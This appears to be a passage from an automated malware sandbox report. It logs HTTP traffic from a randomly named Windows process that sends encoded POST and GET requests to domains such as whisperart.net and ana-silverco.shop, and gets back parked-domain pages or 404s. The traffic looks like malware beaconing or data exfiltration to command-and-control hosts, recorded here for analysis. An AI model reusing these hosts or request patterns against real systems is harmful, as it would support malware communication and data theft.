                                                                            set-cookie: parking_session=7054b1ab-7b6c-49b4-b7a8-71604cbc6e8a; expires=Fri, 06 Dec 2024 16:53:33 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 58 70 36 71 41 74 7a 67 46 72 72 49 79 6a 65 58 55 6b 43 74 50 71 7a 59 48 6f 4c 50 77 56 6a 61 36 5a 69 56 56 59 4b 32 73 34 56 54 54 68 4d 73 45 58 6a 6c 74 78 62 74 6e 57 67 70 56 51 55 62 6e 4c 4b 48 4a 43 2b 54 41 46 6f 76 58 53 75 71 61 41 43 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Dec 6, 2024 17:38:33.910101891 CET | 575 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzA1NGIxYWItN2I2Yy00OWI0LWI3YTgtNzE2MDRjYmM2ZThhIiwicGFnZV90aW1lIjoxNzMzNTAzMT


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            34 | 192.168.2.12 | 49973 | 199.59.243.227 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:38:35.508073092 CET | 804 | OUT | POST /27s6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.whisperart.net
                                                                            Origin: http://www.whisperart.net
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.whisperart.net/27s6/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 36 46 6e 4a 70 69 39 56 2f 50 7a 63 64 6c 54 6f 78 45 42 41 79 49 4a 53 41 4c 2b 48 43 65 52 44 64 77 71 54 63 77 61 43 35 68 2b 4d 41 43 31 7a 75 6c 52 39 32 45 75 5a 72 54 38 35 56 49 51 44 39 46 77 62 35 59 6e 54 59 66 33 4b 54 32 70 65 71 45 4f 4a 75 6f 79 6c 2f 35 68 4b 63 4e 42 6f 37 6f 57 38 74 79 76 67 69 2b 54 76 48 65 58 4c 57 59 36 62 6f 4e 45 74 6f 33 4c 31 64 6d 4d 61 5a 45 66 7a 72 63 30 2b 48 6f 57 31 76 68 2f 6e 56 35 38 34 50 50 5a 61 5a 54 38 6d 70 5a 6d 46 72 51 36 51 46 78 4a 36 69 4c 6a 64 71 69 55 46 54 6c 49 54 62 39 34 78 7a 6f 2b 48 34 79 72 56 4d 41 4d 76 6d 4c 54 4c 7a 76 68 70 4c 59 62 38 69 6d 4e 44 55 50 38 3d
                                                                            Data Ascii: BHptZ6F=6FnJpi9V/PzcdlToxEBAyIJSAL+HCeRDdwqTcwaC5h+MAC1zulR92EuZrT85VIQD9Fwb5YnTYf3KT2peqEOJuoyl/5hKcNBo7oW8tyvgi+TvHeXLWY6boNEto3L1dmMaZEfzrc0+HoW1vh/nV584PPZaZT8mpZmFrQ6QFxJ6iLjdqiUFTlITb94xzo+H4yrVMAMvmLTLzvhpLYb8imNDUP8=
                                                                            Dec 6, 2024 17:38:36.584779024 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Fri, 06 Dec 2024 16:38:35 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1122
                                                                            x-request-id: 3649f253-ea3f-4bd4-b0a8-2afd2e742596
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==
                                                                            set-cookie: parking_session=3649f253-ea3f-4bd4-b0a8-2afd2e742596; expires=Fri, 06 Dec 2024 16:53:36 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 58 70 36 71 41 74 7a 67 46 72 72 49 79 6a 65 58 55 6b 43 74 50 71 7a 59 48 6f 4c 50 77 56 6a 61 36 5a 69 56 56 59 4b 32 73 34 56 54 54 68 4d 73 45 58 6a 6c 74 78 62 74 6e 57 67 70 56 51 55 62 6e 4c 4b 48 4a 43 2b 54 41 46 6f 76 58 53 75 71 61 41 43 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Dec 6, 2024 17:38:36.584816933 CET | 575 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzY0OWYyNTMtZWEzZi00YmQ0LWIwYTgtMmFmZDJlNzQyNTk2IiwicGFnZV90aW1lIjoxNzMzNTAzMT


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            35 | 192.168.2.12 | 49979 | 199.59.243.227 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:38:38.180869102 CET | 1817 | OUT | POST /27s6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.whisperart.net
                                                                            Origin: http://www.whisperart.net
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.whisperart.net/27s6/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 36 46 6e 4a 70 69 39 56 2f 50 7a 63 64 6c 54 6f 78 45 42 41 79 49 4a 53 41 4c 2b 48 43 65 52 44 64 77 71 54 63 77 61 43 35 68 32 4d 41 55 42 7a 75 43 39 39 33 45 75 5a 69 7a 38 34 56 49 52 62 39 46 59 66 35 59 6a 70 59 61 37 4b 53 54 39 65 36 6c 4f 4a 6b 6f 79 6c 67 70 68 4a 52 74 42 39 37 6f 6d 34 74 78 58 67 69 2b 54 76 48 59 7a 4c 42 5a 36 62 76 39 45 75 35 33 4c 78 4d 57 4e 46 5a 48 76 46 72 64 41 75 48 59 32 31 76 42 76 6e 53 4d 6f 34 56 50 5a 59 65 54 38 2b 70 5a 6a 62 72 54 66 72 46 30 64 51 69 4a 7a 64 72 7a 49 54 49 47 51 32 42 4c 30 75 38 4b 2b 48 30 52 33 47 4f 6e 55 59 76 71 7a 71 68 39 4a 6f 46 49 57 31 35 56 42 5a 4f 61 6a 77 34 38 41 34 6a 76 74 61 5a 51 55 64 51 47 4d 2b 38 50 79 7a 75 45 54 72 6a 69 31 51 4b 39 44 76 47 55 44 71 31 6b 31 72 36 79 48 4f 76 51 49 34 67 71 78 35 55 70 58 76 6b 56 5a 6f 65 44 39 79 47 6d 41 6e 32 53 42 72 54 38 49 47 6e 73 64 51 44 5a 32 45 2f 69 66 6b 41 2b 2f 4d 42 38 44 59 6b 76 52 76 66 77 32 46 6f 5a 46 6a 68 41 59 65 32 79 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=6FnJpi9V/PzcdlToxEBAyIJSAL+HCeRDdwqTcwaC5h2MAUBzuC993EuZiz84VIRb9FYf5YjpYa7KST9e6lOJkoylgphJRtB97om4txXgi+TvHYzLBZ6bv9Eu53LxMWNFZHvFrdAuHY21vBvnSMo4VPZYeT8+pZjbrTfrF0dQiJzdrzITIGQ2BL0u8K+H0R3GOnUYvqzqh9JoFIW15VBZOajw48A4jvtaZQUdQGM+8PyzuETrji1QK9DvGUDq1k1r6yHOvQI4gqx5UpXvkVZoeD9yGmAn2SBrT8IGnsdQDZ2E/ifkA+/MB8DYkvRvfw2FoZFjhAYe2y [TRUNCATED]
                                                                            Dec 6, 2024 17:38:39.268841982 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Fri, 06 Dec 2024 16:38:38 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1122
                                                                            x-request-id: 81cc66e7-6bb2-4b58-bb1c-821295be339d
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==
                                                                            set-cookie: parking_session=81cc66e7-6bb2-4b58-bb1c-821295be339d; expires=Fri, 06 Dec 2024 16:53:39 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 58 70 36 71 41 74 7a 67 46 72 72 49 79 6a 65 58 55 6b 43 74 50 71 7a 59 48 6f 4c 50 77 56 6a 61 36 5a 69 56 56 59 4b 32 73 34 56 54 54 68 4d 73 45 58 6a 6c 74 78 62 74 6e 57 67 70 56 51 55 62 6e 4c 4b 48 4a 43 2b 54 41 46 6f 76 58 53 75 71 61 41 43 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Dec 6, 2024 17:38:39.268959999 CET | 575 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODFjYzY2ZTctNmJiMi00YjU4LWJiMWMtODIxMjk1YmUzMzlkIiwicGFnZV90aW1lIjoxNzMzNTAzMT


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            36 | 192.168.2.12 | 49985 | 199.59.243.227 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:38:40.847820997 CET | 516 | OUT | GET /27s6/?RZ=0nkpmZbx9Z4P2&BHptZ6F=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrOYQcOVU79uPxUHt14iAAYzPN76r48s= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.whisperart.net
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:38:41.949567080 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Fri, 06 Dec 2024 16:38:40 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1474
                                                                            x-request-id: 64c5eba8-d0c2-413c-8dd4-4c1dd19362b5
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_BcBtzToiZOlDpcyvOL0wwl8tY+6uMoIHhT8TEcm8tdluL2fKe5c1ufVyTiXxXhOJRF+sScww1ZSpr6oPhb1rkA==
                                                                            set-cookie: parking_session=64c5eba8-d0c2-413c-8dd4-4c1dd19362b5; expires=Fri, 06 Dec 2024 16:53:41 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 42 63 42 74 7a 54 6f 69 5a 4f 6c 44 70 63 79 76 4f 4c 30 77 77 6c 38 74 59 2b 36 75 4d 6f 49 48 68 54 38 54 45 63 6d 38 74 64 6c 75 4c 32 66 4b 65 35 63 31 75 66 56 79 54 69 58 78 58 68 4f 4a 52 46 2b 73 53 63 77 77 31 5a 53 70 72 36 6f 50 68 62 31 72 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_BcBtzToiZOlDpcyvOL0wwl8tY+6uMoIHhT8TEcm8tdluL2fKe5c1ufVyTiXxXhOJRF+sScww1ZSpr6oPhb1rkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Dec 6, 2024 17:38:41.949680090 CET | 927 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjRjNWViYTgtZDBjMi00MTNjLThkZDQtNGMxZGQxOTM2MmI1IiwicGFnZV90aW1lIjoxNzMzNTAzMT


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            37 | 192.168.2.12 | 50001 | 104.21.90.137 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:38:47.386852980 CET | 793 | OUT | POST /ez1t/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.ana-silverco.shop
                                                                            Origin: http://www.ana-silverco.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.ana-silverco.shop/ez1t/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 33 64 73 34 76 4c 2b 52 33 2f 36 5a 57 79 52 38 7a 68 64 2f 4d 59 71 4f 7a 4a 39 4c 33 68 37 76 43 37 4f 35 67 4f 39 37 35 53 74 58 63 54 59 4c 2b 70 65 4f 54 37 50 41 50 79 33 31 4c 73 78 31 58 79 74 69 43 4b 42 4d 35 61 77 34 35 4c 70 7a 50 63 54 38 48 79 78 6c 53 2f 66 53 58 79 41 70 7a 48 6a 67 4e 51 6b 47 57 71 39 4c 57 64 45 5a 63 62 33 39 4e 34 70 33 45 63 39 69 78 45 44 56 69 4c 6f 2f 4d 75 57 38 36 4a 42 70 56 36 35 2f 43 39 31 62 68 6a 63 55 72 53 52 4d 6c 69 44 6a 54 59 44 65 36 38 4c 4d 33 68 4c 33 50 2f 32 43 46 30 44 33 6e 44 34 64 67 74 31 35 67 7a 69 4f 71 77 3d 3d
                                                                            Data Ascii: BHptZ6F=3ds4vL+R3/6ZWyR8zhd/MYqOzJ9L3h7vC7O5gO975StXcTYL+peOT7PAPy31Lsx1XytiCKBM5aw45LpzPcT8HyxlS/fSXyApzHjgNQkGWq9LWdEZcb39N4p3Ec9ixEDViLo/MuW86JBpV65/C91bhjcUrSRMliDjTYDe68LM3hL3P/2CF0D3nD4dgt15gziOqw==
                                                                            Dec 6, 2024 17:38:48.528377056 CET | 898 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:38:48 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Powered-By: PHP/7.4.33
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrbAJGBPqSekiNFNlLHlkWggZwRIBoCZeboYSGLKT88GqdIjBLj%2FtoG0oehOD2Hr%2BwCtriyKTCpNk2kTYGYqwJl4YFKnBBfY6aAe2pugIwxlTEwg7WsA7rLiYXnQl1nJ2rpoRfTjj9w%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8eddb557eba0426a-EWR
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=878&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 190


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            38 | 192.168.2.12 | 50007 | 104.21.90.137 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 6, 2024 17:38:50.058731079 CET | 813 | OUT | POST /ez1t/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.ana-silverco.shop
                                                                            Origin: http://www.ana-silverco.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.ana-silverco.shop/ez1t/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 33 64 73 34 76 4c 2b 52 33 2f 36 5a 5a 7a 68 38 67 57 78 2f 4b 34 71 4e 2f 70 39 4c 39 42 36 48 43 37 53 35 67 4b 74 56 35 6b 56 58 66 32 38 4c 2f 71 47 4f 55 37 50 41 48 53 32 39 47 4d 78 36 58 79 67 64 43 4b 4e 4d 35 61 30 34 35 4f 46 7a 50 76 36 4f 47 69 78 6a 62 66 66 51 59 53 41 70 7a 48 6a 67 4e 51 59 34 57 70 4e 4c 52 74 55 5a 64 2f 6a 2b 41 59 70 30 54 73 39 69 36 6b 44 52 69 4c 6f 64 4d 71 66 5a 36 4c 35 70 56 36 4a 2f 43 70 5a 45 34 54 63 53 6c 79 51 39 32 78 47 73 53 4f 4c 6a 6d 66 65 76 39 46 44 53 44 5a 37 59 61 47 4c 68 79 41 73 51 74 36 4d 4a 74 77 66 48 78 39 47 51 6b 43 32 47 46 64 31 34 62 35 55 37 64 6b 55 68 4c 78 59 3d
